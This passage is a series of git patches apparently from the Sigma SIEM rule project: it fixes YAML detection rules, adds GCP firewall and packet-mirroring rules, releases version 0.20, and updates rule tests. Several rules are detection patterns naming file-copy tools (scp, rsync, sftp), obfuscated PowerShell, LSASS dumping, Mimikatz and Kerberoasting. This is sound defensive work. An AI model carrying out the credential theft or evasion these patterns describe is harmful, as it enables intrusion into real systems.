Altgelt Date: Fri, 13 Aug 2021 15:46:30 +0200 Subject: [PATCH 0327/1367] fix: Correct broken rules, add documentation --- rules/linux/lnx_file_copy.yml | 13 +++++-------- .../builtin/win_alert_enable_weak_encryption.yml | 5 +++++ rules/windows/other/win_defender_disabled.yml | 2 +- 3 files changed, 11 insertions(+), 9 deletions(-) diff --git a/rules/linux/lnx_file_copy.yml b/rules/linux/lnx_file_copy.yml index f48851eb..81b77d8f 100644 --- a/rules/linux/lnx_file_copy.yml +++ b/rules/linux/lnx_file_copy.yml @@ -9,17 +9,14 @@ references: logsource: product: linux detection: - keywords: - - Scp|contains: - - 'scp' - - Rsync|contains: - - 'rsync -r' - - Sftp|contains: - - 'sftp' + tools: + - 'scp ' + - 'rsync ' + - 'sftp ' filter: - '@' - ':' - condition: keywords and filter + condition: tools and filter falsepositives: - Legitimate administration activities level: low diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml index 90af9166..b1728cb4 100644 --- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml +++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml @@ -17,6 +17,11 @@ logsource: detection: selection: EventID: 4738 + # According to Microsoft, the bit values are listed here: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 + # However, that seems to be a simple copy from https://docs.microsoft.com/en-US/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties + # and the actual flags that are used are quite different and, unfortunately, not documented. + # https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/ contains a number of EVTX files with relevant events, which can be used to extract + # the following values. olduac_des: # 0x8000 OldUacValue|endswith: - 8??? diff --git a/rules/windows/other/win_defender_disabled.yml b/rules/windows/other/win_defender_disabled.yml index 0cd77d6d..0c3281a6 100644 --- a/rules/windows/other/win_defender_disabled.yml +++ b/rules/windows/other/win_defender_disabled.yml @@ -54,4 +54,4 @@ detection: keywords: - 'Windows Defender Antivirus Service' - 'stopped' - condition: selection3 and keywords \ No newline at end of file + condition: selection3 and all of keywords \ No newline at end of file From 34bc4c5faa43feaa5fce56371d878fc2646c5aef Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 16:50:34 -0500 Subject: [PATCH 0328/1367] Create gcp_firewall_rule_modified_or_deleted.yml --- .../gcp_firewall_rule_modified_or_deleted.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml new file mode 100644 index 00000000..af297543 --- /dev/null +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Google Cloud Firewall Modified or Deleted +id: fe513c69-734c-4d4a-8548-ac5f609be82b +description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). An adversary may modify a firewall rule in order to weaken their target's security controls. +author: Austin Songer +status: experimental +date: 2021/08/13 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging + - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - v*.compute.firewalls.delete + - v*.compute.firewalls.patch + - v*.compute.firewalls.update + condition: selection +level: medium +tags: + - attack.defense.evasion + - attack.t1562 +falsepositives: + - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected. + - Exceptions can be added to this rule to filter expected behavior. From 7479dcd15d7852100c228d31acf80c59f06cb099 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 16:51:58 -0500 Subject: [PATCH 0329/1367] Update gcp_firewall_rule_modified_or_deleted.yml --- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index af297543..5d4099fb 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -1,6 +1,6 @@ title: Google Cloud Firewall Modified or Deleted id: fe513c69-734c-4d4a-8548-ac5f609be82b -description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). An adversary may modify a firewall rule in order to weaken their target's security controls. +description: Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). author: Austin Songer status: experimental date: 2021/08/13 From a973c6c4455bcf01176528afe0c3e3398efb4f56 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 17:07:18 -0500 Subject: [PATCH 0330/1367] Create gcp_full_network_traffic_packet_capture.yml --- ...cp_full_network_traffic_packet_capture.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml new file mode 100644 index 00000000..3d6bbd22 --- /dev/null +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -0,0 +1,26 @@ +title: Google Full Network Traffic Packet Capture +id: 980a7598-1e7f-4962-9372-2d754c930d0e +description: Identifies potential full network packet capture in AWS. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. +author: Austin Songer +status: experimental +date: 2021/08/13 +references: + - https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging + - https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - v*.Compute.PacketMirrorings.Get + - v*.Compute.PacketMirrorings.Delete + - v*.Compute.PacketMirrorings.Insert + - v*.Compute.PacketMirrorings.Patch + condition: selection +level: medium +tags: + - attack.collection + - attack.t1074 +falsepositives: + - Full Network Packet Capture may be done by a system or network administrator. + - If known behavior is causing false positives, it can be exempted from the rule. From c4b41f8d66f31e81879c8bd1acfc4c092f094f01 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 17:07:48 -0500 Subject: [PATCH 0331/1367] Update gcp_full_network_traffic_packet_capture.yml --- rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml index 3d6bbd22..321addd3 100644 --- a/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml +++ b/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml @@ -1,6 +1,6 @@ title: Google Full Network Traffic Packet Capture id: 980a7598-1e7f-4962-9372-2d754c930d0e -description: Identifies potential full network packet capture in AWS. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. +description: Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. author: Austin Songer status: experimental date: 2021/08/13 From 6ee9fc9bd68ec9fed498015e8576d352ecb2461e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 13 Aug 2021 17:08:58 -0500 Subject: [PATCH 0332/1367] Update gcp_firewall_rule_modified_or_deleted.yml --- rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml index 5d4099fb..0ab30c2a 100644 --- a/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml @@ -18,7 +18,7 @@ detection: condition: selection level: medium tags: - - attack.defense.evasion + - attack.defense_evasion - attack.t1562 falsepositives: - Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected. From 5c4fd3a1229a9f30ae05d5eaf8446eee06cdb063 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Sat, 14 Aug 2021 00:25:12 +0200 Subject: [PATCH 0333/1367] Release 0.20 --- CHANGELOG.md | 36 ++++++++++++++++++++++++++++++++++++ tools/setup.py | 9 ++++----- 2 files changed, 40 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 22c20035..ece949b9 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,42 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html) from version 0.14.0. +## 0.20 - 2021-08-14 + +### Added + +* Devo backend +* Fields selection added to SQL backend +* Linux/MacOS support for MDATP backend +* Output results as generic YAML/JSON +* Hash normalization option (hash_normalize) for Elasticsearch wildcard handling +* ALA AWS Cloudtrail and Azure mappings +* Logrhytm backend +* Splunk Data Models backend +* Further log sources used in open source Sigma ruleset +* CarbonBlack EDR backend +* Elastic EQL backend +* Additional conversion selection filters +* Filter negation +* Specifiy table in SQL backend +* Generic registry event log source +* Chronicle backend + +### Changed + +* Elastic Watcher backend populates name attribute instead of title. +* One item list optimization. +* Updated Winlogbeat mapping +* Generic mapping for Powershell backend + +### Fixed + +* Elastalert multi output file +* Fixed duplicate output in ElastAlert backend +* Escaping in Graylog backend +* es-rule ndjson output +* Various fixes of known bugs + ## 0.19.1 - 2021-02-28 ### Changed diff --git a/tools/setup.py b/tools/setup.py index 5793f455..239d18be 100644 --- a/tools/setup.py +++ b/tools/setup.py @@ -14,7 +14,7 @@ with open(path.join(here, 'LONG_DESCRIPTION.md'), encoding='utf-8') as f: setup( name='sigmatools', - version='0.19.1', + version='0.20', description='Tools for the Generic Signature Format for SIEM Systems', long_description=long_description, long_description_content_type="text/markdown", @@ -30,9 +30,8 @@ setup( 'Topic :: Security', 'Topic :: Internet :: Log Analysis', 'License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)', - 'Programming Language :: Python :: 3.6', - 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', + 'Programming Language :: Python :: 3.9', 'Environment :: Console', ], keywords='security monitoring siem logging signatures elasticsearch splunk ids sysmon', @@ -43,8 +42,8 @@ setup( 'sigma.parser', 'sigma.parser.modifiers', ], - python_requires='~=3.6', - install_requires=['PyYAML', 'pymisp', 'progressbar2'], + python_requires='~=3.8', + install_requires=['PyYAML', 'pymisp', 'progressbar2', 'ruamel.yaml'], extras_require={ 'test': ['coverage', 'yamllint'], }, From e45557316eb3b9769cadd43296af983e61def843 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 14 Aug 2021 09:54:27 +0200 Subject: [PATCH 0334/1367] Fix selection with only 1 element --- rules/linux/lnx_process_discovery.yml | 3 +- rules/linux/macos_clear_system_logs.yml | 3 +- .../win_invoke_obfuscation_clip+_services.yml | 4 +-- ...n_register_new_logon_process_by_rubeus.yml | 5 +-- .../windows/builtin/win_susp_rc4_kerberos.yml | 3 +- ...ileged_service_lsaregisterlogonprocess.yml | 7 ++-- .../sysmon_non_priv_program_files_move.yml | 3 +- .../file_event/sysmon_pcre_net_temp_file.yml | 6 ++-- .../image_load/sysmon_pcre_net_load.yml | 6 ++-- .../win_sdbinst_shim_persistence.yml | 10 +++--- .../process_creation/win_service_stop.yml | 4 +-- .../process_creation/win_susp_atbroker.yml | 12 +++---- ...w_disk_access_using_illegitimate_tools.yml | 3 +- ...smon_registry_persistence_search_order.yml | 16 ++++----- tests/test_rules.py | 33 ++++++++++--------- 15 files changed, 62 insertions(+), 56 deletions(-) diff --git a/rules/linux/lnx_process_discovery.yml b/rules/linux/lnx_process_discovery.yml index 1785e7ef..3dd32ec7 100644 --- a/rules/linux/lnx_process_discovery.yml +++ b/rules/linux/lnx_process_discovery.yml @@ -4,6 +4,7 @@ status: stable description: Detects process discovery commands author: Ömer Günal, oscd.community date: 2020/10/06 +modified: 2021/08/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md logsource: @@ -11,7 +12,7 @@ logsource: category: process_creation detection: selection: - - Image|endswith: + Image|endswith: - '/ps' - '/top' condition: selection diff --git a/rules/linux/macos_clear_system_logs.yml b/rules/linux/macos_clear_system_logs.yml index 33ce525a..4df61165 100644 --- a/rules/linux/macos_clear_system_logs.yml +++ b/rules/linux/macos_clear_system_logs.yml @@ -4,6 +4,7 @@ status: experimental description: Detects deletion of local audit logs author: remotephone, oscd.community date: 2020/10/11 +modified: 2021/08/14 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md logsource: @@ -11,7 +12,7 @@ logsource: category: process_creation detection: selection1: - - Image|endswith: '/rm' + Image|endswith: '/rm' selection2: CommandLine|contains: '/var/log' selection3: diff --git a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml index b33bf0cb..0b502851 100644 --- a/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml +++ b/rules/windows/builtin/win_invoke_obfuscation_clip+_services.yml @@ -5,7 +5,7 @@ description: Detects Obfuscated use of Clip.exe to execute PowerShell status: experimental author: Jonathan Cheong, oscd.community date: 2020/10/13 -modified: 2020/05/27 +modified: 2021/08/14 references: - https://github.com/Neo23x0/sigma/issues/1009 #(Task 26) tags: @@ -18,7 +18,7 @@ falsepositives: level: high detection: selection: - - ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + ImagePath|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' condition: selection and selection_eventid --- logsource: diff --git a/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml b/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml index 323fe260..9f5b2215 100644 --- a/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml +++ b/rules/windows/builtin/win_register_new_logon_process_by_rubeus.yml @@ -11,13 +11,14 @@ tags: - attack.t1558.003 author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community date: 2019/10/24 +modified: 2021/08/14 logsource: product: windows service: security detection: selection: - - EventID: 4611 - LogonProcessName: 'User32LogonProcesss' + EventID: 4611 + LogonProcessName: 'User32LogonProcesss' condition: selection falsepositives: - Unknown diff --git a/rules/windows/builtin/win_susp_rc4_kerberos.yml b/rules/windows/builtin/win_susp_rc4_kerberos.yml index 496ed152..91d3b5b1 100644 --- a/rules/windows/builtin/win_susp_rc4_kerberos.yml +++ b/rules/windows/builtin/win_susp_rc4_kerberos.yml @@ -11,6 +11,7 @@ tags: description: Detects service ticket requests using RC4 encryption type author: Florian Roth date: 2017/02/06 +modified: 2021/08/14 logsource: product: windows service: security @@ -20,7 +21,7 @@ detection: TicketOptions: '0x40810000' TicketEncryptionType: '0x17' reduction: - - ServiceName|startswith: '$' + ServiceName|startswith: '$' condition: selection and not reduction falsepositives: - Service accounts used on legacy systems (e.g. NetApp) diff --git a/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml b/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml index f8d3b458..51ad7f78 100644 --- a/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml +++ b/rules/windows/builtin/win_user_couldnt_call_privileged_service_lsaregisterlogonprocess.yml @@ -11,14 +11,15 @@ tags: - attack.t1558.003 author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community date: 2019/10/24 +modified: 2021/08/14 logsource: product: windows service: security detection: selection: - - EventID: 4673 - Service: 'LsaRegisterLogonProcess()' - Keywords: '0x8010000000000000' #failure + EventID: 4673 + Service: 'LsaRegisterLogonProcess()' + Keywords: '0x8010000000000000' #failure condition: selection falsepositives: - Unknown diff --git a/rules/windows/file_event/sysmon_non_priv_program_files_move.yml b/rules/windows/file_event/sysmon_non_priv_program_files_move.yml index b7440b4b..1a5025a1 100644 --- a/rules/windows/file_event/sysmon_non_priv_program_files_move.yml +++ b/rules/windows/file_event/sysmon_non_priv_program_files_move.yml @@ -4,6 +4,7 @@ description: Search for dropping of files to Windows/Program Files fodlers by no status: experimental author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community date: 2020/10/17 +modified: 2021/08/14 references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg tags: @@ -18,7 +19,7 @@ detection: integrity: IntegrityLevel: 'Medium' program_files: - - TargetFilename|contains: + TargetFilename|contains: - '\Program Files\' - '\Program Files (x86)\' windows: diff --git a/rules/windows/file_event/sysmon_pcre_net_temp_file.yml b/rules/windows/file_event/sysmon_pcre_net_temp_file.yml index f45d3e39..f4668f6c 100644 --- a/rules/windows/file_event/sysmon_pcre_net_temp_file.yml +++ b/rules/windows/file_event/sysmon_pcre_net_temp_file.yml @@ -3,7 +3,7 @@ id: 6e90ae7a-7cd3-473f-a035-4ebb72d961da description: Detects processes creating temp files related to PCRE.NET package status: experimental date: 2020/10/29 -modified: 2021/05/21 +modified: 2021/08/14 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -16,8 +16,8 @@ logsource: product: windows detection: selection: - - TargetFilename|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ + TargetFilename|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/image_load/sysmon_pcre_net_load.yml b/rules/windows/image_load/sysmon_pcre_net_load.yml index 383a83b9..3debcfa6 100644 --- a/rules/windows/image_load/sysmon_pcre_net_load.yml +++ b/rules/windows/image_load/sysmon_pcre_net_load.yml @@ -3,7 +3,7 @@ id: 84b0a8f3-680b-4096-a45b-e9a89221727c description: Detects processes loading modules related to PCRE.NET package status: experimental date: 2020/10/29 -modified: 2021/05/21 +modified: 2021/08/14 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.execution @@ -16,8 +16,8 @@ logsource: product: windows detection: selection: - - ImageLoaded|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ + ImageLoaded|contains: \AppData\Local\Temp\ba9ea7344a4a5f591d6e5dc32a13494b\ condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/win_sdbinst_shim_persistence.yml b/rules/windows/process_creation/win_sdbinst_shim_persistence.yml index 66b93984..c688f5fa 100644 --- a/rules/windows/process_creation/win_sdbinst_shim_persistence.yml +++ b/rules/windows/process_creation/win_sdbinst_shim_persistence.yml @@ -11,18 +11,16 @@ tags: - attack.t1138 # an old one author: Markus Neis date: 2019/01/16 -modified: 2021/04/01 +modified: 2021/08/14 logsource: category: process_creation product: windows detection: selection: - Image|endswith: - - '\sdbinst.exe' - CommandLine|contains: - - '.sdb' + Image|endswith: '\sdbinst.exe' + CommandLine|contains: '.sdb' filter: - - CommandLine|contains: + CommandLine|contains: - 'iisexpressshim.sdb' # normal behaviour for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120) condition: selection and not filter falsepositives: diff --git a/rules/windows/process_creation/win_service_stop.yml b/rules/windows/process_creation/win_service_stop.yml index f77e0b64..6cc71eb1 100644 --- a/rules/windows/process_creation/win_service_stop.yml +++ b/rules/windows/process_creation/win_service_stop.yml @@ -4,7 +4,7 @@ description: Detects a windows service to be stopped status: experimental author: Jakob Weinzettl, oscd.community date: 2019/10/23 -modified: 2019/11/08 +modified: 2021/08/14 tags: - attack.impact - attack.t1489 @@ -13,7 +13,7 @@ logsource: product: windows detection: selection: - - Image|endswith: + Image|endswith: - '\sc.exe' - '\net.exe' - '\net1.exe' diff --git a/rules/windows/process_creation/win_susp_atbroker.yml b/rules/windows/process_creation/win_susp_atbroker.yml index ac9584df..b8e182c8 100644 --- a/rules/windows/process_creation/win_susp_atbroker.yml +++ b/rules/windows/process_creation/win_susp_atbroker.yml @@ -7,6 +7,7 @@ references: status: experimental author: Mateusz Wydra, oscd.community date: 2020/10/12 +modified: 2021/08/14 tags: - attack.defense_evasion - attack.t1218 @@ -14,12 +15,11 @@ logsource: category: process_creation product: windows detection: - selection1: - - Image|endswith: 'AtBroker.exe' - selection2: - - CommandLine|contains: 'start' + selection: + Image|endswith: 'AtBroker.exe' + CommandLine|contains: 'start' filter: - - CommandLine|contains: + CommandLine|contains: - animations - audiodescription - caretbrowsing @@ -47,7 +47,7 @@ detection: - windowtracking - windowtrackingtimeout - windowtrackingzorder - condition: selection1 and selection2 and not filter + condition: selection and not filter falsepositives: - Legitimate, non-default assistive technology applications execution level: high diff --git a/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml b/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml index 72fbafb6..abb7d2c7 100644 --- a/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml +++ b/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml @@ -3,6 +3,7 @@ id: db809f10-56ce-4420-8c86-d6a7d793c79c description: Raw disk access using illegitimate tools, possible defence evasion author: Teymur Kheirkhabarov, oscd.community date: 2019/10/22 +modified: 2021/08/14 references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment tags: @@ -15,7 +16,7 @@ detection: filter_1: Device|contains: floppy filter_2: - - Image|endswith: # easy to bypass. requires extra rule to support this one + Image|endswith: # easy to bypass. requires extra rule to support this one - '\wmiprvse.exe' - '\sdiagnhost.exe' - '\searchindexer.exe' diff --git a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml index 7f4b07fc..0b5fd732 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_search_order.yml @@ -6,7 +6,7 @@ references: - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2021/05/01 +modified: 2021/08/14 tags: - attack.persistence - attack.t1038 # an old one @@ -21,24 +21,24 @@ detection: - '_Classes\CLSID\' - '\InProcServer32\(Default)' filter1: - - Details|contains: # Exclude privileged directories and observed FPs + Details|contains: # Exclude privileged directories and observed FPs - '%%systemroot%%\system32\' - '%%systemroot%%\SysWow64\' filterOneDrive: - - Details|contains: '\AppData\Local\Microsoft\OneDrive\' + Details|contains: '\AppData\Local\Microsoft\OneDrive\' filterOneDrive2: - - Details|contains: + Details|contains: - '\FileCoAuthLib64.dll' - '\FileSyncShell64.dll' - '\FileSyncApi64.dll' filter2: - - Details|contains|all: + Details|contains|all: - '\AppData\Local\Microsoft\TeamsMeetingAddin\' - '\Microsoft.Teams.AddinLoader.dll' filter3: - - Details|contains|all: - - '\AppData\Roaming\Dropbox\' - - '\DropboxExt64.*.dll' + Details|contains|all: + - '\AppData\Roaming\Dropbox\' + - '\DropboxExt64.*.dll' condition: selection and not ( filter1 or ( filterOneDrive and filterOneDrive2 ) or filter2 or filter3 ) falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/tests/test_rules.py b/tests/test_rules.py index cc53d85b..0efb2218 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -553,28 +553,29 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source") - #deactivate because more than 170 rules have been corrected - # def test_selection_list_one_value(self): - # faulty_rules = [] - # for file in self.yield_next_rule_file_path(self.path_to_rules): - # detection = self.get_rule_part(file_path=file, part_name="detection") - # if detection: - # valid = True - # for key in detection: - # if isinstance(detection[key],list): - # if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term - # print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 value in detection".format(file, key)) - # #valid = False + + def test_selection_list_one_value(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + detection = self.get_rule_part(file_path=file, part_name="detection") + if detection: + valid = True + for key in detection: + if isinstance(detection[key],list): + if len(detection[key]) == 1 and not isinstance(detection[key][0],str): #rule with only list of Keywords term + print(Fore.RED + "Rule {} has the selection ({}) with a list of only 1 element in detection".format(file, key)) + valid = False + #deactivate because more than 170 rules have to be corrected # if isinstance(detection[key],dict): # for sub_key in detection[key]: # if isinstance(detection[key][sub_key],list): #split in 2 if as get a error "int has not len()" # if len(detection[key][sub_key]) == 1: # print (Fore.RED + "Rule {} has the selection ({}/{}) with a list of only 1 value in detection".format(file, key, sub_key)) # #valid = False - # if not valid: - # faulty_rules.append(file) - # - # self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 value") + if not valid: + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 element") def get_mitre_data(): """ From db0de126a556a3adf5c1906483218438a8eee2be Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 14 Aug 2021 19:16:36 +0200 Subject: [PATCH 0335/1367] test author for Detection Rule License 1.1 --- rules/network/zeek/zeek_susp_kerberos_rc4.yml | 1 + rules/windows/builtin/win_susp_lsass_dump.yml | 1 + .../image_load/sysmon_mimikatz_inmemory_detection.yml | 1 + tests/test_rules.py | 8 ++++++-- 4 files changed, 9 insertions(+), 2 deletions(-) diff --git a/rules/network/zeek/zeek_susp_kerberos_rc4.yml b/rules/network/zeek/zeek_susp_kerberos_rc4.yml index c5b85768..23867c4e 100644 --- a/rules/network/zeek/zeek_susp_kerberos_rc4.yml +++ b/rules/network/zeek/zeek_susp_kerberos_rc4.yml @@ -1,6 +1,7 @@ title: Kerberos Network Traffic RC4 Ticket Encryption id: 503fe26e-b5f2-4944-a126-eab405cc06e5 status: experimental +author: sigma date: 2020/02/12 description: Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting references: diff --git a/rules/windows/builtin/win_susp_lsass_dump.yml b/rules/windows/builtin/win_susp_lsass_dump.yml index fef8980b..8da6d370 100644 --- a/rules/windows/builtin/win_susp_lsass_dump.yml +++ b/rules/windows/builtin/win_susp_lsass_dump.yml @@ -2,6 +2,7 @@ title: Password Dumper Activity on LSASS id: aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c description: Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN status: experimental +author: sigma date: 2017/02/12 modified: 2021/06/21 references: diff --git a/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml b/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml index d2158436..db4a867f 100755 --- a/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml +++ b/rules/windows/image_load/sysmon_mimikatz_inmemory_detection.yml @@ -1,6 +1,7 @@ title: Mimikatz In-Memory id: c0478ead-5336-46c2-bd5e-b4c84bc3a36e status: experimental +author: sigma description: Detects certain DLL loads when Mimikatz gets executed references: - https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/ diff --git a/tests/test_rules.py b/tests/test_rules.py index 0efb2218..4cff6e75 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -397,7 +397,8 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") - def test_optional_author(self): + # Upgrade Detection Rule License 1.1 + def test_author(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): author_str = self.get_rule_part(file_path=file, part_name="author") @@ -406,9 +407,12 @@ class TestRules(unittest.TestCase): if not isinstance(author_str, str): print(Fore.YELLOW + "Rule {} has a 'author' field that isn't a string.".format(file)) faulty_rules.append(file) + else: + print(Fore.YELLOW + "Rule {} has no 'author' field".format(file)) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + - "There are rules with malformed optional 'author' fields. (has to be a string even if it contains many author)") + "There are rules with malformed 'author' fields. (has to be a string even if it contains many author)") def test_optional_tlp(self): faulty_rules = [] From 3900ba9e2cc9586a0537e5c194275d3fe08495cb Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 14 Aug 2021 19:42:29 +0200 Subject: [PATCH 0336/1367] add license test --- tests/test_rules.py | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 4cff6e75..e3fac59b 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -414,6 +414,18 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'author' fields. (has to be a string even if it contains many author)") + def test_optional_license(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + license_str = self.get_rule_part(file_path=file, part_name="license") + if license_str: + if not isinstance(license_str, str): + print(Fore.YELLOW + "Rule {} has a malformed 'license' (has to be a string).".format(file)) + faulty_rules.append(file) + + 